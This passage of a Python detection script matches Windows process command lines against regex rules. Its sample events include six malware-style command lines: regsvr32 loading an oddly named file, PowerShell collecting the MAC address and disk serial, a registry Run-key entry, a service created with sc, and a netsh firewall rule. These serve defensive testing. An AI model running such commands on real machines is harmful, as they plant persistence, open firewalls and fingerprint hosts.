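    """Return the names of every rule whose regexes all match cmdline."""
    return [name for name, pats in RULES
            if all(re.search(p, cmdline, re.IGNORECASE) for p in pats)]


def scan(events):
    """Return [(event_id, rule_name)] for every rule hit across the events."""
    return [(ev["id"], name) for ev in events for name in classify(ev["cmdline"])]


# Constructed process-creation events: six from the write-ups, two benign.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": r'"C:\Windows\System32\regsvr32.exe" C:\Users\user\AppData\Local\Qwtxr\Fmkdp.adj'},
    {"id": 2, "cmdline": (
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe getmac "
        r"| Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; "
        r"wmic path win32_physicalmedia get SerialNumber "
        r"| Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'")},
    {"id": 3, "cmdline": r'REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F'},
    {"id": 4, "cmdline": r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\" C:\Windows\SysWOW64' '\\'},
    {"id": 5, "cmdline": r'"C:\Windows\System32\sc.exe" create binPath= "C:\Windows\SysWOW64\\ /d\"C:\Users\\Desktop\"" type= own start= auto DisplayName= "wifi support"'},
    {"id": 6, "cmdline": r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes'},
    {"id": 7, "cmdline": r'"C:\Windows\System32\regsvr32.exe" /s C:\Windows\System32\msxml3.dll'},
    {"id": 8, "cmdline": r'"C:\Windows\System32\sc.exe" query wuauserv'},
]

if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```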